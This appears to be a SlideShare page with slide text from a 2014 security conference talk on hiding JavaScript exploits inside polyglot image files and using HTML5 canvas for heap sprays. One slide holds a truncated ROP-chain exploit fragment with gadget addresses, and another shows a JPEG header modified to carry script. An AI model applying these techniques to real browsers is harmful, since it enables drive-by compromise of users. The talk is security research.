SlideShare ist ein Scribd-Unternehmen logo

Hacking with Pictures: Exploiting Browsers with Steganography and Polyglot Files

Saumil Shah
Saumil Shah

This document discusses hiding malicious payloads in images and other file formats. It describes how JavaScript code can be embedded and executed from within JPEG, GIF and BMP image files using techniques like modified file headers. It also explains how the HTML5 canvas element can be used for heap sprays to facilitate exploitation in modern browsers with stricter encoding rules. The document concludes that these image-based attack techniques pose challenges for forensic analysis and defense.

SoftwareIngenieurwesenTechnologie
1 von 29
Hacking with Pictures net-square Saumil Shah Hack.LU 2014
Saumil Shah CEO, Net-Square net-square Introduction @therealsaumil saumilshah hacker, trainer, speaker, author - educating, entertaining and exasperating audiences since 1999
net-square #who am i CEO Net-Square Reverse Engineering Exploit Writing Penetration Testing Offensive Security Attack Defense Conference Speaker Conference Trainer Web 2.0 HTML5 XSS CSRF SQLi CORS XST clickjacking AJAX FLASH RIA SOAP Web Services UXSS XPATHi .... ... <insert buzzwordy appsec jargon here>
net-square Avoiding Radar JS Obfuscation Broken File Formats OLE Embedding Javascript/ Actionscript Spreading the payload
net-square Hiding In Plain Sight
G r e e t i n g s P r o f e s s o r F a l k e n net-square
net-square I'm an evil Javascript I'm an innocent image
net-square function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(une scape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}var addressof=new Array();addressof["ropnop"]=0x6d81bdf0;addressof["xchg_eax _esp_ret"]=0x6d81bdef;addressof["pop_eax_ret"]=0x6d906744; addressof["pop_ecx_ret"]=0x6d81cd57;addressof["mov_peax_ec x_ret"]=0x6d979720;addressof["mov_eax_pecx_ret"]=0x6d8d7be 0;addressof["mov_pecx_eax_ret"]=0x6d8eee01;addressof["inc_ eax_ret"]=0x6d838f54;addressof["add_eax_4_ret"]=0x00000000 ;addressof["call_peax_ret"]=0x6d8aec31;addressof["add_esp_ 24_ret"]=0x00000000;addressof["popad_ret"]=0x6d82a8a1;addr essof["call_peax"]=0x6d802597;function call_ntallocatevirtualmemory(baseptr,size,callnum){var ropnop=packv(addressof["ropnop"]);var pop_eax_ret=packv(addressof["pop_eax_ret"]);var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);var call_peax_ret=packv(addressof["call_peax_ret"]);var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);var popad_ret=packv(addressof["popad_ret"]);var retval=""! <CANVAS>
net-square Avoid the EVIL eval() var a = eval(str); a = (new Function(str))(); Hat tip: Dr. Mario Heiderich @0x6D6172696F
Theory Becomes Practice - 2014 net-square Hiding In Plain Sight
IMAJS net-square I IZ JAVASCRIPT!
Cross Container Scripting - XCS net-square <img src="itsatrap.gif"> <script src="itsatrap.gif"> </script>
net-square IMAJS – The Concept • "Polyglot files" – term coined by Ange Albertini @corkami • IMAJS is targeted towards browsers. • It is a perfectly valid image... • ...and a perfectly valid Javascript!
IMAJS-GIF Browser Support Height Width Browser/Viewer Image net-square Renders? Javascript Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE no yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera ? ? 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer no - 2f 2a 00 00 Win 7 Preview yes -
IMAJS-BMP Browser Support Height Width Browser/Viewer Image net-square Renders? Javascript Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE yes yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer yes - 2f 2a 00 00 Win 7 Preview yes -
net-square All new IMAJS-JPG! • JPG is more powerful than other formats for hiding stuff. • Thanks to EXIF data! • JPG+JS • JPG+HTML • ...and JPG+JS+HTML! Hat tip: Michael Zalewski @lcamtuf
Start marker length Start marker length net-square The Secret Sauce Regular JPEG Header FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 FF E2 ... "J F I F 0" next section... Modified JPEG Header FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 41 41 41 41 41...12074..41 41 41 FF E2 ... next section... "J F I F 0" whole lot of extra space!
FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 41 41 41 41 41...12074..41 41 41 FF E2 ... Start marker comment! net-square The Secret Sauce Modified JPEG Header See the difference? FF D8 FF E0 /* 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 */='';alert(Date());/*...41 41 41 FF E2 ... Javascript goes here next section... Start marker length next section... "J F I F 0" whole lot of extra space!
net-square
CANVASHTML5 for Exploit Dev • jscript9.dll introduced many changes. – No %u0000 in strings. – No 0x00000000 in strings. • Kills conventional Heap Sprays. • <CANVAS> to the rescue! • IE9 and above "support" HTML5. • <!DOCTYPE html> net-square
net-square CANVAS for Exploit Dev • Heap Sprays through Pixel Arrays! • No character restrictions. – All pixels treated equally! • And a bonus... ALPHA CHANNELS.
net-square Stegosploit!
MS14-035 CInput Use-After-Free IMAJS stego PWN! net-square
< PAYLOADS GO net-square back in time
I'M IN UR BASE GET /lolcat.png 200 OK net-square Attack Timeline JS Exploit code encoded in PNG. EVIL ....KILLING UR DOODZ GET /decoder.jpg 200 OK GET /lolcat.png 304 Not Modified Decoder script references PNG from cache. SAFE MAY 2014 OCT 2014
net-square Conclusions - Offensive • Lot of possibilities! • Weird containers, weird encoding, weird obfuscation. • Image attacks emerging "in the wild". • Not limited to just browsers.
net-square Conclusions - Defensive • DFIR nightmare. – how far back does your window of inspection go? • Can't rely on extensions, file headers, MIME types or magic numbers. • Wake up call to browser-wallahs.
net-square Greets and props • Michael Zalewski @lcamtuf • Ange Albertini @corkami • @zer0mem • Mario Heiderich @0x6D6172696F • The fantastic crew of HACK.LU!
net-square Saumil Shah saumil@net-square.com @therealsaumil saumilshah

Empfohlen

2012: The End of the World?
2012: The End of the World?2012: The End of the World?
2012: The End of the World?Saumil Shah
 
Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Saumil Shah
 
Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSSaumil Shah
 
Exploit Delivery
Exploit DeliveryExploit Delivery
Exploit DeliverySaumil Shah
 
Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015Saumil Shah
 
Innovative Exploit Delivery
Innovative Exploit DeliveryInnovative Exploit Delivery
Innovative Exploit DeliverySaumil Shah
 
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec JourneySaumil Shah
 
15 years through Infosec
15 years through Infosec15 years through Infosec
15 years through InfosecSaumil Shah
 

Empfohlen

2012: The End of the World?
2012: The End of the World?2012: The End of the World?
2012: The End of the World?Saumil Shah
 
Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Saumil Shah
 
Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSSaumil Shah
 
Exploit Delivery
Exploit DeliveryExploit Delivery
Exploit DeliverySaumil Shah
 
Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015Saumil Shah
 
Innovative Exploit Delivery
Innovative Exploit DeliveryInnovative Exploit Delivery
Innovative Exploit DeliverySaumil Shah
 
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec JourneySaumil Shah
 
15 years through Infosec
15 years through Infosec15 years through Infosec
15 years through InfosecSaumil Shah
 
Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Saumil Shah
 
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images44CON
 
Echo HTML5
Echo HTML5Echo HTML5
Echo HTML5Nathan Smith
 
HTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwordsHTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwordsMo Jangda
 
CSS3 3D Workshop
CSS3 3D WorkshopCSS3 3D Workshop
CSS3 3D WorkshopChristopher Schmitt
 
Css3 101
Css3 101Css3 101
Css3 101Ignacio Coloma
 
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON
 
Web Presentations, deck.js and Extensions
Web Presentations, deck.js and ExtensionsWeb Presentations, deck.js and Extensions
Web Presentations, deck.js and Extensionsremiemonet
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich
 
[heweb11] CSS3 Makeover
[heweb11] CSS3 Makeover[heweb11] CSS3 Makeover
[heweb11] CSS3 MakeoverChristopher Schmitt
 
Introduction to Transcoding: Tools and Processes
Introduction to Transcoding: Tools and ProcessesIntroduction to Transcoding: Tools and Processes
Introduction to Transcoding: Tools and ProcessesPrestoCentre
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
Abusing JavaScript for fun and profit
Abusing JavaScript for fun and profitAbusing JavaScript for fun and profit
Abusing JavaScript for fun and profitMyles Eftos
 
Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?Patrick Chanezon
 
Flash Is Dead, Long Live Flash!
Flash Is Dead, Long Live Flash!Flash Is Dead, Long Live Flash!
Flash Is Dead, Long Live Flash!Rye Corradini
 
Flash 101
Flash 101Flash 101
Flash 101Stanley Fok
 
[Worskhop Summits] CSS3 Workshop
[Worskhop Summits] CSS3 Workshop[Worskhop Summits] CSS3 Workshop
[Worskhop Summits] CSS3 WorkshopChristopher Schmitt
 
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceSaumil Shah
 
Minimalism in Web Development
Minimalism in Web DevelopmentMinimalism in Web Development
Minimalism in Web DevelopmentJamie Matthews
 
Performance as UX with Justin Howlett
Performance as UX with Justin HowlettPerformance as UX with Justin Howlett
Performance as UX with Justin HowlettFITC
 
The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksSaumil Shah
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSSaumil Shah
 

Weitere ähnliche Inhalte

Ähnlich wie Hacking with Pictures: Exploiting Browsers with Steganography and Polyglot Files

Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Saumil Shah
 
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images44CON
 
HTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwordsHTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwordsMo Jangda
 
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON
 
Web Presentations, deck.js and Extensions
Web Presentations, deck.js and ExtensionsWeb Presentations, deck.js and Extensions
Web Presentations, deck.js and Extensionsremiemonet
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich
 
Introduction to Transcoding: Tools and Processes
Introduction to Transcoding: Tools and ProcessesIntroduction to Transcoding: Tools and Processes
Introduction to Transcoding: Tools and ProcessesPrestoCentre
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
Abusing JavaScript for fun and profit
Abusing JavaScript for fun and profitAbusing JavaScript for fun and profit
Abusing JavaScript for fun and profitMyles Eftos
 
Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?Patrick Chanezon
 
Flash Is Dead, Long Live Flash!
Flash Is Dead, Long Live Flash!Flash Is Dead, Long Live Flash!
Flash Is Dead, Long Live Flash!Rye Corradini
 
[Worskhop Summits] CSS3 Workshop
[Worskhop Summits] CSS3 Workshop[Worskhop Summits] CSS3 Workshop
[Worskhop Summits] CSS3 WorkshopChristopher Schmitt
 
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceSaumil Shah
 
Minimalism in Web Development
Minimalism in Web DevelopmentMinimalism in Web Development
Minimalism in Web DevelopmentJamie Matthews
 
Performance as UX with Justin Howlett
Performance as UX with Justin HowlettPerformance as UX with Justin Howlett
Performance as UX with Justin HowlettFITC
 

Ähnlich wie Hacking with Pictures: Exploiting Browsers with Steganography and Polyglot Files (20)

Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015
 
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
 
Echo HTML5
Echo HTML5Echo HTML5
Echo HTML5
 
HTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwordsHTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwords
 
CSS3 3D Workshop
CSS3 3D WorkshopCSS3 3D Workshop
CSS3 3D Workshop
 
Css3 101
Css3 101Css3 101
Css3 101
 
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
 
Web Presentations, deck.js and Extensions
Web Presentations, deck.js and ExtensionsWeb Presentations, deck.js and Extensions
Web Presentations, deck.js and Extensions
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
 
[heweb11] CSS3 Makeover
[heweb11] CSS3 Makeover[heweb11] CSS3 Makeover
[heweb11] CSS3 Makeover
 
Introduction to Transcoding: Tools and Processes
Introduction to Transcoding: Tools and ProcessesIntroduction to Transcoding: Tools and Processes
Introduction to Transcoding: Tools and Processes
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
Abusing JavaScript for fun and profit
Abusing JavaScript for fun and profitAbusing JavaScript for fun and profit
Abusing JavaScript for fun and profit
 
Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?
 
Flash Is Dead, Long Live Flash!
Flash Is Dead, Long Live Flash!Flash Is Dead, Long Live Flash!
Flash Is Dead, Long Live Flash!
 
Flash 101
Flash 101Flash 101
Flash 101
 
[Worskhop Summits] CSS3 Workshop
[Worskhop Summits] CSS3 Workshop[Worskhop Summits] CSS3 Workshop
[Worskhop Summits] CSS3 Workshop
 
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
 
Minimalism in Web Development
Minimalism in Web DevelopmentMinimalism in Web Development
Minimalism in Web Development
 
Performance as UX with Justin Howlett
Performance as UX with Justin HowlettPerformance as UX with Justin Howlett
Performance as UX with Justin Howlett
 

Mehr von Saumil Shah

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksSaumil Shah
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSSaumil Shah
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkSaumil Shah
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Saumil Shah
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise PresentationsSaumil Shah
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceSaumil Shah
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020Saumil Shah
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadSaumil Shah
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceSaumil Shah
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadSaumil Shah
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadSaumil Shah
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019Saumil Shah
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-XSaumil Shah
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDSaumil Shah
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019Saumil Shah
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019Saumil Shah
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM AssemblySaumil Shah
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSSaumil Shah
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling PhotographSaumil Shah
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKSaumil Shah
 

Mehr von Saumil Shah (20)

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM Assembly
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMS
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
 

Kürzlich hochgeladen

EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityNeo4j
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...soniya singh
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfkalichargn70th171
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...aditisharan08
 
Project Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationProject Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationkaushalgiri8080
 
buds n tech IT solutions
buds n tech IT solutionsbuds n tech IT solutions
buds n tech IT solutionsmonugehlot87
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataBradBedford3
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...Christina Lin
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software DevelopersVinodh Ram
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningVitsRangannavar
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackVICTOR MAESTRE RAMIREZ
 
XpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsXpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsMehedi Hasan Shohan
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...MyIntelliSource, Inc.
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantAxelRicardoTrocheRiq
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...OnePlan Solutions
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)OPEN KNOWLEDGE GmbH
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWave PLM
 

Kürzlich hochgeladen (20)

EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered Sustainability
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
